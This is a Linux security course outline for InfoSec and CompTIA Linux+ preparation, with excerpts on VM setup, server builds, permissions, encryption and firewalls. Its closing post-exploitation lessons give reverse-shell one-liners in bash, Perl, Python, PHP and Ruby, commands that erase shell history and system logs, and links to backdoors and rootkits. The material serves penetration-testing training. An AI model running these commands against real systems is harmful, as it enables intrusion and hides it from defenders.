Linux For InfoSec & Comptia Linux+ Exam Prep

COURSE DETAILS

The Linux for InfoSec Professionals course is a “Zero to Hero” style of training program designed to take someone with little to no Linux experience up to a highly competent Linux practitioner. It will not only teach you the security concepts and guidelines that will keep your Linux servers safe, it will walk you through hardening measures step-by-step.

This course also serves as a great prep guide for the Comptia Linux+ certification.

The CompTIA Linux+ certification covers common tasks in major distributions of Linux, including the Linux command line, basic maintenance, installing and configuring workstations, and networking. Linux+ consists of two exams, LX0-103 and LX0-104. Candidates must pass LX0-103 before taking LX0-104.

Unlike Security+ and Network+, you never have to renew the Linux+ certification. This accreditation is good for life. There are no Continuing Education (CE) requirements.

Course By

Joseph McCray

Lessons

C1L1: Getting Familiar with VMWare


For this workshop, the required prerequisite is the latest version of VMWare Workstation (Windows/Linux), Fusion (Mac), or Workstation Player (Windows/Linux). A 30-day trial of Workstation 12.1.1 can be downloaded from here: http://www.vmware.com/products/workstation/workstation-evaluation A 30-day trial of Fusion 8 can be downloaded from here: https://www.vmware.com/products/fusion/fusion-evaluation.html The newest version of VMWare Workstation Player 12.1.1 can be [...]

C1L2: Installing VMWare and setting up the InfoSec Addicts Ubuntu VM

All of the courses offered by InfoSec Addicts utilize Virtual Machines running on VMWare. If you do not own or want to purchase VMWare Workstation, you can download and install the latest VMWare Workstation Player for free. As of this writing (1/17/2017), both Workstation and Player are at version 12.5.2.

C1L3: Installing VMware Workstation Player

INSTALLING VMWARE WORKSTATION PLAYER First download the player from the following link: https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0 We are going to download the Windows version. The filename will default to the correct version and build number of the current release. Click Save to accept the default location and filename. If you do not want to use the [...]

C1L4: Download the InfoSec Addicts Virtual Machine

If you have not yet downloaded it, save it from the appropriate link for your class. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip Username: infosecaddicts Password: infosecaddicts Extract the contents to a suitable location for your Virtual Machines; you will use this in the next step. NOTE: We are performing this operation in VMWare Workstation Player 12.5.2 running on a [...]

C1L5: Adding the VM to VMWare Workstation Player

VMWARE CONFIGURATION Double-click the VMware icon on the desktop. The first time you launch the program, you will be asked to enter a valid email address or license key. This will not occur on subsequent launches. Enter a valid email address or license key as appropriate, then click on Continue. Click Finish to launch [...]

C1L6: Download and install the attack VM

If you have not yet done so, download and save it from the appropriate link for your class. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip Username: infosecaddicts Password: infosecaddicts Extract the contained directory to a suitable location for your Virtual Machines; you will use this in the next step. NOTE: We are performing this operation in VMWare Workstation Player 12.1.1 running on [...]

C1L7: Launch VMware Workstation Player 12.5.2

Double-click the VMware icon on the desktop. Click on Open a Virtual Machine to browse for our Ubuntu VM. From the File > Open screen, navigate to the location of your Virtual Machine and select the .vmx file, then click Open to continue. Your VM is now loaded into the player in a Powered Off state. [...]

C1L8: Installing open-vm-tools

As we are working on a Linux variant (Ubuntu) that provides open-vm-tools via the repository, we can ignore the VMware warning to update the tools. Once installed, they will be kept up to date with the daily system update. More information is available here: http://kb.vmware.com/kb/2073803 From the command prompt type: sudo apt-get install open-vm-tools Enter ‘Y’ to continue. After a [...]

C1L9: Legacy installation of VMWare Tools – included for reference only.

At the bottom of the VM window, you should then see the following. Click Update Tools. You will be shown instructions on how to update them. The required media should have auto-mounted, as evidenced by the icon. Click the icon to open the media in the File Manager. Right-click on the VMWareTools package and [...]

C2L1: Basic Linux Commands

Let’s get started with some basic Linux commands. These commands provide a wealth of information to the pentester, allowing them to successfully navigate and exploit the target system. To open a terminal in Linux, press Ctrl+Alt+T or click the gear icon and type in “terminal”. pwd - print working directory, shows you your [...]

C2L2: The power of ls

THE POWER OF THE LS COMMAND The ls command is probably the most commonly used command and can provide lots of useful information. The ls (list) command lists information about the file(s) within a directory. By default it lists the directory you are currently working in. However, it can be told to show data from other [...]

C2L3: How to find stuff in Linux

You’ll often find yourself looking for things. Here are some useful tips for just that. Several commands have proven useful for finding things in Linux. find is a popular command line tool that searches for files in the directory hierarchy. The command searches the current directory and recursively searches subdirectories for the supplied [...]

C2L4: What is Vim?

Vim is a text editor available on most Unix systems. Its name is an acronym for Vi Improved. Vim was originally developed by Bram Moolenaar as a clone of Bill Joy's vi editor for Unix. Originally developed for the Amiga, it has since grown to become a full-fledged text editor, provided with additional features designed to be helpful [...]

C2L5: Getting Started

First off, vim has a fairly extensive man page accessible with the following command: man vim - view the manual page for vim To begin, launch vim from a command prompt: vim Or alternatively, to begin editing a specific file: vim You will be in the main editor screen. New File File directly opened [...]

C2L6: Modes within vim

Command mode - This is the default mode when you launch vim or open a file in it. This mode allows you to navigate around the file in a manner that does not alter the contents. It also allows you to enter various commands, such as insert, append, or delete. One of the biggest challenges new vim users have is that [...]

C2L7: Basic Keyboard Commands

BASIC KEYBOARD COMMANDS All of these commands must be entered via Last Line mode, so they are preceded by the colon ‘ : ‘ character when listed below. All text contained within brackets ‘ [ ] ‘ is optional. :q[uit] Exit (or Quit) the current file :q[uit]! Exit (or Quit) the current file, aborting all [...]

C3L1: Basic Shell Scripting

BASIC SHELL SCRIPTING A Bash script is a plain text file that contains a series of commands, the same commands we would normally type ourselves on the command line. Your "shell", also called the command line interface, is bash, the Bourne Again Shell. There are hundreds of shells available for Linux [...]

C4L1: Module 4: Compiling & Debugging

C is a compiled programming language, not a scripting language like the shell. On Linux we need a compiler to build C programs, rather than the interpreter used by the shell. GCC is a very powerful compiler that is simple to use and available on most Linux distributions. To debug the C program, we need [...]

C5L1 Module 5: Getting familiar with Ubuntu

Let’s learn Ubuntu by building and configuring it. There are a few ways you can become familiar with Ubuntu or any flavor of Linux: boot from a live CD (though this generally lacks persistence, so no changes are saved), or install and configure your own machine. As most of us don’t have spare machines just sitting around, [...]

C5L2: Build the Ubuntu Perfect Server using Ubuntu 16.04

Before we can begin building the perfect server, we must first have a minimal installation up and running. Download an appropriate image from http://releases.ubuntu.com/xenial/ and install it using a tutorial such as: https://www.howtoforge.com/tutorial/ubuntu-minimal-server-install/ For more info on this, see the videos: http://infosecaddicts.com/wp-content/uploads/2018/01/linuxserverimagedownload-1.mp4 http://infosecaddicts.com/wp-content/uploads/2018/01/linuxserverinstall.mp4

C5L3: Preliminary Information

We are using a domain of tps-ubuntu1604.example.com on IP address 192.168.10.139 with a gateway address of 192.168.10.2. Be sure to change these to values appropriate for your local environment. We have installed vim and are going to use it to edit files. With the introduction of version 16.04, apt-get has been replaced by apt, which streamlines package management and removes the need to run apt-get autoremove to clean [...]

C5L4: Update Your Linux Installation

Keeping with best practices, let’s start by making sure our installation is up to date. sudo vim /etc/apt/sources.list Comment out, or remove, the installation CD from the file. Make sure that the universe repository and multiverse repository are enabled. To update the apt package database, run sudo apt update And then install any updates with [...]

C5L5: Changing the default Shell

By default, the shell is set to /bin/dash. This will cause issues with later tools such as ISPConfig, so we need to change it to /bin/bash. sudo dpkg-reconfigure dash - Answer No. We can verify with a quick check. ls -alF http://infosecaddicts.com/wp-content/uploads/2018/01/linuxshellchange.mp4

C5L6: Disable AppArmor

AppArmor is a SELinux extension meant to provide a stronger method of securing your server. To install ISPConfig, which we do later in this tutorial, we need to disable AppArmor. http://infosecaddicts.com/wp-content/uploads/2018/01/apparmorremove.mp4

C5L7: Synchronize the System Clock

Any time you run a server, especially one that has a public-facing internet connection, it is critical that its time is in sync with the rest of the world. We can ensure this by running: sudo apt -y install ntp ntpdate http://infosecaddicts.com/wp-content/uploads/2018/01/ntpdate.mp4

C5L8: Install Postfix, Dovecot, MariaDB, rkhunter and binutils

Before we can install Postfix, we need to ensure sendmail is not installed or running. sudo service sendmail stop; sudo update-rc.d -f sendmail remove If you see an error on stopping sendmail, don’t worry. It just means that sendmail wasn’t running. Now we can install Postfix, Dovecot, MariaDB (a MySQL replacement), rkhunter, and binutils with a [...]

C5L9: Postfix – Manual Configurations

We want to open the SSL/TLS ports. Edit /etc/postfix/master.cf and uncomment the submission and smtps sections. Uncomment the first 3 lines and insert the following as the 4th line: sudo vim /etc/postfix/master.cf -o smtpd_client_restrictions=permit_sasl_authenticated,reject NOTE: The whitespace (indentation) in front of the -o lines is crucial to proper operation. When done editing, the sections should [...]

C5L10: MariaDB – Manual Configurations

We want MySQL to listen on all the interfaces, not just the localhost. Edit /etc/mysql/mariadb.conf.d/50-server.cnf and comment out the line bind-address = 127.0.0.1: sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf Now we secure our installation. sudo mysql_secure_installation Set a new root MariaDB password that you can remember and accept the defaults for all other questions. Restart MariaDB with: sudo [...]

C5L11: Installing Amavisd-new, SpamAssassin, and Clamav

We can install Amavisd-new, SpamAssassin, and ClamAV with one command: sudo apt -y install amavisd-new spamassassin clamav clamav-daemon zoo unzip bzip2 arj nomarch lzop cabextract apt-listchanges libnet-ldap-perl libauthen-sasl-perl clamav-docs daemon libio-string-perl libio-socket-ssl-perl libnet-ident-perl zip libnet-dns-perl postgrey Hmmm. Looks like all installed except for Amavisd-new. A quick look at systemctl status shows us that we [...]

C5L12: Installing Apache, PHP, phpMyAdmin, FCGI, SuExec, Pear

Installing Apache2, PHP 7, phpMyAdmin, FCGI, suExec, Pear, and mcrypt in a single command line. sudo apt -y install apache2 apache2-doc apache2-utils libapache2-mod-php php7.0 php7.0-common php7.0-gd php7.0-mysql php7.0-imap phpmyadmin php7.0-cli php7.0-cgi libapache2-mod-fcgid apache2-suexec-pristine php-pear php-auth php7.0-mcrypt mcrypt imagemagick libruby libapache2-mod-python php7.0-curl php7.0-intl php7.0-pspell php7.0-recode php7.0-sqlite3 php7.0-tidy php7.0-xmlrpc php7.0-xsl memcached php-memcache php-imagick php-gettext php7.0-zip Make sure to [...]

C5L13: PHP Opcode cache

A free PHP opcode cache, which caches and optimizes PHP intermediate code, is strongly recommended to speed up your PHP pages. One such option is APCu. sudo apt -y install php7.0-opcache php-apcu Restart Apache to enable the changes. http://infosecaddicts.com/wp-content/uploads/2018/01/C5L13.mp4

C5L14: PHP-FPM

To use PHP-FPM with Apache, we need to install the mod_fastcgi Apache module. NOTE: This is not the same as mod_fcgid. sudo apt -y install libapache2-mod-fastcgi php7.0-fpm Enable the module and then restart Apache to complete. sudo a2enmod actions fastcgi alias http://infosecaddicts.com/wp-content/uploads/2018/01/C5L141.mp4 http://infosecaddicts.com/wp-content/uploads/2018/01/C5L142.mp4

C5L15: Additional PHP Versions

It is possible to have multiple PHP versions on one server (selectable through ISPConfig), but this will not be covered in this section. For more info on this, visit: https://www.howtoforge.com/how-to-use-multiple-php-versions-php-fpm-and-fastcgi-with-ispconfig-3-ubuntu-12.10 http://infosecaddicts.com/wp-content/uploads/2018/01/C5L15.mp4

C5L16: Installing Let’s Encrypt

ISPConfig 3.1 comes with built-in support for Let's Encrypt, the free SSL certificate authority, allowing us to create free SSL certificates for use on our website(s). First, we add support for Let's Encrypt. sudo mkdir /opt/certbot && cd /opt/certbot sudo wget https://dl.eff.org/certbot-auto sudo chmod a+x ./certbot-auto Run the certbot-auto command to download and [...]

C5L17: Install Mailman

ISPConfig allows us to manage Mailman mailing lists. To make use of this feature, we need to install Mailman. sudo apt -y install mailman Select at least one language and then OK to continue. Select OK and then create the mailman list. sudo newlist mailman Hit enter to continue and add the following aliases to [...]

C5L18: Install PureFTPd and Quota

PureFTPd and Quota can be installed together with the following command: sudo apt -y install pure-ftpd-common pure-ftpd-mysql quota quotatool Configure PureFTPd by editing /etc/default/pure-ftpd-common sudo vim /etc/default/pure-ftpd-common Set the start mode to standalone and VIRTUALCHROOT=true. As written, FTP is a very insecure protocol because all passwords and data are transferred in the clear. To increase security, we want [...]

C5L19: Installing BIND DNS Server

The BIND DNS server will allow us to host the DNS entries for our example.com domain. sudo apt -y install bind9 dnsutils haveged We will set up our zone files in a later step. http://infosecaddicts.com/wp-content/uploads/2018/01/C5L19.mp4

C5L20: Installing Vlogger, Webalizer, and AWstats

Vlogger, Webalizer, and AWstats allow us to monitor and keep tabs on our server usage. Install them with: sudo apt -y install vlogger webalizer awstats geoip-database libclass-dbi-mysql-perl Edit /etc/cron.d/awstats and comment out everything. sudo vim /etc/cron.d/awstats http://infosecaddicts.com/wp-content/uploads/2018/01/C5L20.mp4

C5L21: Installing Jailkit

Jailkit is only necessary if you need to chroot SSH users into their own specific directories. It is a set of utilities used to limit user accounts to specific files using chroot() and/or to specific commands via a chroot shell session. If you want to use it, it must be installed BEFORE installing ISPConfig, not afterwards. sudo [...]

C5L22: Installing fail2ban and UFW

While these are optional, it is recommended to install them, as the ISPConfig monitor will attempt to log their results. Fail2ban is an Intrusion Detection System (IDS) that monitors for and assists in the automated blocking of brute-force attacks. UFW refers to Uncomplicated Firewall. First, install fail2ban: sudo apt -y install fail2ban Then create the following [...]

C5L23: Installing Roundcube Webmail

There are many webmail clients to choose from. Roundcube is one of the more popular, so we will install it in this tutorial. Install Roundcube Webmail with the following command: sudo apt -y install roundcube roundcube-core roundcube-mysql roundcube-plugins roundcube-plugins-extra javascript-common libjs-jquery-mousewheel php-net-sieve tinymce Roundcube requires a database. Just select Yes. Create a password to [...]

C5L24: Installing ISPConfig 3

Install the latest version of ISPConfig 3 as follows: cd /tmp sudo wget -O ispconfig.tar.gz https://git.ispconfig.org/ispconfig/ispconfig3/rep... NOTE: The above is one complete command line. sudo unzip ispconfig.tar.gz cd ispconfig3-master-e1ceb050e19c7574bca146a8da7047ee4ff456b5 cd install Running the installation script will configure ISPConfig 3 for all necessary daemons, rolling out the manual configuration. sudo php -q install.php Change any options as appropriate or [...]

C5L25: Install SSHFS

Frequently it is advantageous to work on and edit files on your VM (especially cloud-based instances) from your local machine. Perhaps you have a favorite IDE that is not available for, or won’t run in, a VM. To accomplish this, we need to mount the remote system locally and access it via ssh. NOTE: As ssh [...]

C5L26: Installing SSHFS on Ubuntu

Install SSHFS: sudo apt-get install sshfs Mounting the Remote File System Create a local directory to mount the remote share on, replacing “mountpoint” with something meaningful to your environment. If the directory already exists, the command will fail and say so. sudo mkdir /mnt/mountpoint Now mount the remote share. sudo sshfs -o allow_other,defer_permissions [email protected]:/var/www /mnt/tps-web [...]

C5L27: Install Samba

Reference: http://www.krizna.com/ubuntu/setup-file-server-ubuntu-14-04-samba/ sudo apt-get update sudo apt-get remove samba sudo apt-get install samba mkdir /home/infosecaddicts/samba sudo nano /etc/samba/smb.conf Then press Ctrl-O to save and Ctrl-X to exit from the nano text editor. sudo service smbd restart http://infosecaddicts.com/wp-content/uploads/2018/01/install-samba.webm

C5L28: Install Google 2 Factor Authentication

Two-Factor Authentication (2FA), often referred to as Multifactor Authentication (MFA), adds a layer of complexity to your authentication mechanism to help protect your systems or services. As the name implies, you need more than one authentication factor to validate access. Typically this includes a combination of something you: Know - like [...]

C5L29: Installing libpam-google-authenticator

This adds Google's PAM module to your Linux machine. sudo apt-get install libpam-google-authenticator Generate a user key by running: google-authenticator As we are using Google Authenticator, answer yes to: Do you want authentication tokens to be time-based (y/n) At this point a lot of output will scroll past, including a: QR Code secret [...]

C5L30: Configuring OpenSSH

Now that we have created a TOTP key, we need to configure SSH to use it. Edit the sshd PAM configuration and add the following line to the end of it. sudo vim /etc/pam.d/sshd auth required pam_google_authenticator.so nullok nullok at the end tells PAM that this authentication method is optional. This allows users without a TOTP key [...]

C5L31: Making SSH Aware of MFA

Look for PasswordAuthentication, uncomment it and change the “yes” to “no.” Add the following line underneath UsePAM yes: AuthenticationMethods publickey,keyboard-interactive Save and exit. Now edit the PAM sshd configuration file. sudo vim /etc/pam.d/sshd Find the line @include common-auth and comment it out. Save and close, then restart SSH: sudo service ssh restart Try logging into the server [...]

C5L32: Install Mod_Security

What is Mod_Security? According to their website, “ModSecurity is another toolkit for monitoring real-time web applications, logging, and access control. It's also an enabler: there are no hard rules telling you what to do; instead, it's up to you to decide your path through the available features.” https://www.modsecurity.org/about.html Basically, it protects your website from various exploits such as Cross-Site Scripting, [...]

C5L33: Configuring Mod_Security Rules

Create the configuration file with: sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf Then edit the file with: sudo vim /etc/modsecurity/modsecurity.conf Activate the rules by setting the ‘SecRuleEngine’ option to On. Ensure that SecRequestBodyLimit is set to a minimum of 10000000 and that SecRequestBodyNoFilesLimit and SecRequestBodyInMemoryLimit are set to 10% of SecRequestBodyLimit. The available Mod_Security rules are here: /usr/share/modsecurity-crs/base_rules /usr/share/modsecurity-crs/optional_rules /usr/share/modsecurity-crs/experimental_rules To enable all [...]

C5L34: Configuring OWASP (Open Web Application Security Project)

Git clone or download and install the OWASP Core Rule Set for a base install. Be sure git is up to date: sudo apt-get install git Clone the repository: sudo git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git Move the existing modsecurity-crs to a backup copy, then replace it with the version just cloned. sudo mv /usr/share/modsecurity-crs /usr/share/modsecurity-crs.bak sudo mv owasp-modsecurity-crs [...]

C6L2: Preliminary Information

CentOS is a cloned version of the commercial Red Hat Linux distribution. This differs from Ubuntu Server, which is a Debian-based distribution. For this installation and configuration, we will be using the IP address 192.168.1.100/24 and 192.168.1.1 as the gateway address, with server1.example.com as the hostname. A key difference between Ubuntu and CentOS is [...]

C6L3: Update Your Linux Installation

UPDATING YOUR LINUX INSTALLATION Keeping with best practices, let’s start by making sure our installation is up to date. su -c 'yum update' then use su -c 'yum upgrade' Since we are installing ISPConfig later on in this section, we will need to disable the default CentOS firewall. Let’s install net-tools: sudo yum -y install net-tools The -y [...]

C6L4: Disable SELinux

SELinux is a security extension that is intended to provide additional security to the system. It will be disabled because we are installing ISPConfig later on. Let’s edit /etc/selinux/config and set SELINUX=disabled sudo vi /etc/selinux/config Now reboot the system using reboot. http://infosecaddicts.com/wp-content/uploads/2018/01/C6L4-Disable-SELinux.webm

C6L5: Enable Additional Repositories and Install Software

We need to import the GPG keys for software packages. To do this, run the following command: rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY* We now need to enable the EPEL (Extra Packages for Enterprise Linux) repository on our system. This is a repository from Fedora that provides high-quality add-on software packages for Red Hat Enterprise Linux distributions. yum [...]

C6L6: Quota

Disk quotas are used to alert a system admin when too much disk space is being used or when a partition becomes full. Quotas can be configured for individual users and for user groups. Quotas may also be used to control the number of inodes (the data structures that contain information about files in UNIX file systems). Let’s [...]

C6L7: Enabling quota on the root partition

Quota is usually enabled in the /etc/fstab file. If the filesystem is the root filesystem “/”, then quota has to be enabled by a boot parameter of the Linux kernel. Let’s edit the grub configuration file. vi /etc/default/grub Look for the line that begins with GRUB_CMDLINE_LINUX and add rootflags=uquota,gquota to the end of the line, inside the quotes. Save [...]

C6L8: Enabling quota on a separate /var partition

If you have a separate /var partition, please refer to https://www.howtoforge.com/tutorial/perfect-server-centos-7-2-apache-mysql-php-pureftpd-postfix-dovecot-and-ispconfig/

vi /etc/fstab

#
# /etc/fstab
# Created by anaconda on Sun Sep 21 16:33:45 2014
#
# Accessible filesystems, by reference, are maintained under '/dev/disk'
# See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info
#
/dev/mapper/centos-root / xfs defaults 1 1 [...]

C6L9: Install Apache, MySQL (MariaDB), phpMyAdmin

Apache is a widely used open source web server that is fast, reliable, and secure. MySQL (MariaDB) is a free, open source Relational Database Management System that uses Structured Query Language (SQL) for adding, accessing and managing data in a database. phpMyAdmin is an open source tool used to manage MySQL. All these services can [...]

C6L10: Install Dovecot

Dovecot is an open source IMAP and POP3 server for Linux. It is a lightweight, fast and easy-to-set-up mail server developed with security in mind. https://wiki.archlinux.org/index.php/dovecot To install Dovecot, use the following commands. yum -y install dovecot dovecot-mysql dovecot-pigeonhole Next, create an empty dovecot-sql.conf file and a symbolic link to it. touch /etc/dovecot/dovecot-sql.conf ln -s /etc/dovecot/dovecot-sql.conf /etc/dovecot-sql.conf cd to [...]

C6L12: Install Postfix

Postfix is an open source mail transfer agent (MTA). The software is free under the IBM Public License 1.0. To install Postfix, use the following commands. yum -y install postfix Next, turn off Sendmail and start Postfix and MySQL (MariaDB): systemctl enable mariadb.service systemctl start mariadb.service systemctl stop sendmail.service systemctl disable sendmail.service systemctl enable postfix.service [...]

C6L13: Install GetMail

GetMail is a mail retrieval agent implemented in Python. It is free software licensed under the GNU General Public License v2. Simply install Getmail as follows. yum -y install getmail Ubuntu http://infosecaddicts.com/wp-content/uploads/2018/01/C6L13-Install-GetMail.webm Centos 7 http://infosecaddicts.com/wp-content/uploads/2018/01/C6L13-Install-GetMail-centos.webm

C6L14: Set MySQL Passwords and Configure phpMyAdmin

It is important to set a complex password for the MySQL root account. We do this using: mysql_secure_installation At the Set root password prompt, enter the actual password. Hit enter for the next prompts that appear. Now, let’s configure phpMyAdmin. We want to allow connections to MySQL (MariaDB) from [...]

C6L15: Install Amavisd-new, SpamAssassin, and ClamAV

Amavisd-new is an interface used between an MTA and content checkers such as virus scanners and SpamAssassin. Written in Perl, it talks to the MTA via SMTP or LMTP. SpamAssassin is an open source anti-spam platform used to filter and block spam. ClamAV is an open source antivirus tool for Unix-based [...]

C6L16: Installing Apache with mod_php, mod_fcgi/PHP5, PHP-FPM

In this lesson, we will be adding some features to our Apache server that allow PHP and Apache to communicate better. This is installed for use with ISPConfig 3, which will be installed later. Install the following: yum -y install php php-devel php-gd php-imap php-ldap php-mysql php-odbc php-pear php-xml php-xmlrpc php-pecl-apc php-mbstring php-mcrypt php-mssql [...]

C6L17: Installation of mod_python

mod_python will need to be compiled from source code to run. mod_python is an Apache module that embeds the Python interpreter in Apache, allowing the Apache server to execute Python. First, let’s install the Python development files. yum -y install python-devel Now let’s change directories to /usr/local/src and download the source as a tar.gz file. wget http://dist.modpython.org/dist/mod_python-3.5.0.tgz Once [...]

C6L18: Install PureFTPD

PureFTPD is a free, secure file transfer tool for Unix/Linux-based systems. Let’s install the tool and then start it: yum -y install pure-ftpd systemctl enable pure-ftpd.service systemctl start pure-ftpd.service Let’s allow both FTP and TLS sessions. By allowing TLS, communications will be encrypted, making the file transfer more secure. For TLS, we need to [...]

C7L1: Security Concepts – Permissions – Users & Groups

Intro to permissions Linux is a multi-user operating system that uses file ownership and permissions to provide security at the file system level. Linux has users and groups defined to apply the various security settings needed. Users & Groups There are five types of users that a Linux system has. These users have [...]

C7L2: Security Concepts – Permissions – Viewing ownership & permissions

Viewing ownership and permissions Permissions are set on every file in the file system. To view the permissions of a file or directory, type: ls -l The above image shows the first 10 lines of the /home directory listing. Let’s break down what this is telling us. The mode breaks down into the file type and permission [...]

C7L3: Security Concepts – Permissions – Modifying permissions

Modifying permissions Sometimes, the owner of a file needs to change who can do what with their files. This is achieved using the following commands: chmod, chgrp, chown. chmod changes the mode bits of a file. chgrp modifies the group ownership of a file. chown changes the file owner and group. Reference(s): https://www.digitalocean.com/community/tutorials/an-introduction-to-linux-permissions https://linuxsecuritysolution.com/2013/02/10/linux-user-types/ http://infosecaddicts.com/wp-content/uploads/2018/01/C7L3-Security-Concepts-Permissions-Modifying-permissions.mp4

C8L1: Security Concepts – Encryption – Symmetric Key Encryption

Symmetric Key Encryption Symmetric key encryption uses the same cryptographic key for both encryption of plaintext and decryption of ciphertext. The two keys are either identical or related by a simple transformation. The keys represent a shared secret between multiple parties, used to maintain a private information link. The following walkthrough continues to show how [...]

C8L2: Security Concepts – Encryption – Asymmetric Key Encryption

Asymmetric Key Encryption Asymmetric key encryption, also called public key cryptography, uses both a private key and a public key to encrypt and decrypt data. Key pairs are generated using a cryptographic algorithm based on mathematical problems. Public keys are shared widely, while the private key is known only to the owner. Asymmetric encryption also [...]

C8L3: Security Concepts – Encryption – Encryption using OpenSSL

Encryption using OpenSSL OpenSSL is a software library used to secure communications against eavesdropping. OpenSSL contains an open-source implementation of the SSL and TLS protocols. openssl is also a command line tool that allows a user to use the functions of the OpenSSL crypto library from the shell. openssl genrsa -out private_key.pem 1024 # generate RSA private key [...]

C9L1: Security Concepts – Firewall Concepts

What is IPTables? IPTables is the rule-based firewall utility that normally comes pre-installed on Linux/Unix operating systems. IPTables inspects incoming and outgoing packets. The default structure for IPTables is Tables -> Chains -> Rules. IPTables contains 5 different tables where chains and rules are held. The filter and nat tables are the most commonly used tables. The [...]

C9L2: Security Concepts – Firewall Concepts – Demo

IPTables Demo Now that we are familiar with the basics of IPTables, let’s see how it can be used. If IPTables isn’t coming up, try upgrading your system using sudo apt upgrade. NOTE: Use sudo with the below commands. Commands can’t be run as a regular user. Reference(s): http://www.thegeekstuff.com/2011/06/iptables-rules-examples/ https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/3/html/Reference_Guide/s1-iptables-options.html Common commands used with IPTables iptables [] -A [...]

C11L1: Security Concepts – AppArmor

What is AppArmor? Reference(s): http://askubuntu.com/questions/236381/what-is-apparmor https://wiki.ubuntu.com/AppArmor https://help.ubuntu.com/community/AppArmor AppArmor is a kernel security module for Linux that enforces Mandatory Access Control (MAC). It allows a system administrator to restrict program capabilities with per-program profiles. These profiles are loaded into the kernel at system startup. AppArmor is an alternative to SELinux and is included in Ubuntu There [...]

C12L1: Security Concepts – Log Analysis

Security Concepts - Log Analysis Linux log basics Reference(s): http://www.thegeekstuff.com/2011/08/linux-var-log-files/ https://help.ubuntu.com/community/LinuxLogFiles Linux log files are usually stored in the /var/log directory of the file system. These logs contain a wealth of information about what the system is doing or has done. Virtually everything done in a Linux system is logged in some form or fashion. [...]

C13L1: Let’s hack this StrategicSec VM

Module X: Let’s hack this StrategicSec VM We’ve done a bunch of other stuff - now let’s do what we came here to learn how to do. Let’s hack this StrategicSec VM. Let’s go for a quick SUID exploit. SUID is the way UNIX-like systems run commands as another user without requiring credentials. [...]

C14L1: Security Concepts – Post Exploitation

Security Concepts - Post Exploitation Post exploitation basics The real skill in the world of hacking is NOT breaking into a machine - it’s staying on a compromised host. This is honestly the real dark arts of hacking. Getting files onto a system cat >> exploit.c << out tftp -i 72.29.77.15 nc wget http://www.learnsecurityonline.com/nc lynx [...]

C14L3: Security Concepts – Avoiding history & cleaning logs

Avoiding history & cleaning logs export HISTFILE=/dev/null or unset HISTFILE HISTSAVE HISTSIZE rm -rf /root/.bash_history ln -sf /dev/null /root/.bash_history rm -rf /var/log/messages ln -sf /dev/null /var/log/messages Removing entries from logs: grep -v $entry-to-remove $logfile > /tmp/a ; mv /tmp/a $logfile touch -r $file_with_timestamp_to_match $logfile Things to try: https://packetstormsecurity.com/files/128142/wtmpclean-0.8.1.html https://packetstormsecurity.com/files/118922/Last-Door-Log-Wiper.html http://www.lo0.ro/2011/08/09/gotroot-shell-script/ https://packetstormsecurity.com/files/112328/RopeADope-1.1-Linux-Log-Cleaner.html http://infosecaddicts.com/wp-content/uploads/2018/01/C14L3-Security-Concepts-Avoiding-history-cleaning-logs.mp4  

C14L4: Security Concepts – Breaking out of a restricted shell

Breaking out of a restricted shell https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/ https://blog.netspi.com/attacking-restricted-linux-shells/ http://infosecaddicts.com/wp-content/uploads/2018/06/C14L4-Security-Concepts-Breaking-out-of-a-restricted-shell-1.mp4  

C14L6: Security Concepts – Reverse Shells

Reverse Shells Bash bash -i >& /dev/tcp/$IP-ADDRESS/8080 0>&1 PERL perl -e 'use Socket;$i="$IP-ADDRESS";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Python Tested under Linux / Python 2.7: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP-ADDRESS",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP php -r '$sock=fsockopen("$IP-ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby ruby -rsocket -e'f=TCPSocket.open("$IP-ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat Netcat is available rarely on production systems and even if [...]

C14L7: Security Concepts – Tunneling

Tunneling ICMP Tunneling: http://null-byte.wonderhowto.com/how-to/hack-like-pro-create-nearly-undetectable-covert-channel-with-tunnelshell-0155704/ http://log.lain.li/blog/setting-up-ip-over-icmp-with-hans/ DNS Tunneling: http://resources.infosecinstitute.com/dns-tunnelling/ https://zeltser.com/c2-dns-tunneling/ SSH Tunneling: http://u-tips-n-tricks.blogspot.com/2012/12/ssh-tunnel.html http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html http://www.linuxjournal.com/content/ssh-tunneling-poor-techies-vpn STunnel: https://www.digitalocean.com/community/tutorials/how-to-set-up-an-ssl-tunnel-using-stunnel-on-ubuntu Reverse SSH Tunneling: https://www.howtoforge.com/reverse-ssh-tunneling

C14L8: Security Concepts – Persistence

Persistence Simple Gawk backdoor: http://r00tsec1.blogspot.com/2012/07/a-backdoor-in-gawk-by-thegrugg.html Xinetd backdoor https://packetstormsecurity.com/files/26161/pure-xinetd-backdoor.c.html

C14L9: Security Concepts – Post Exploitation – Finding backdoors and rootkits

Finding backdoors https://www.rawhex.com/2016/03/a-guide-to-recognising-backdoors-using-metasploitable-2/ Rootkits https://packetstormsecurity.com/files/125240/Azazel-Userland-Rootkit.html https://packetstormsecurity.com/files/118317/Linux-2.6-Kernel-proc-Rootkit-Backdoor.html https://packetstormsecurity.com/files/110942/Jynx-Kit-Release-2.html https://packetstormsecurity.com/files/108286/KBeast-Kernel-Beast-Linux-Rootkit-2012.html

C16L1: What flavor of *nix are on

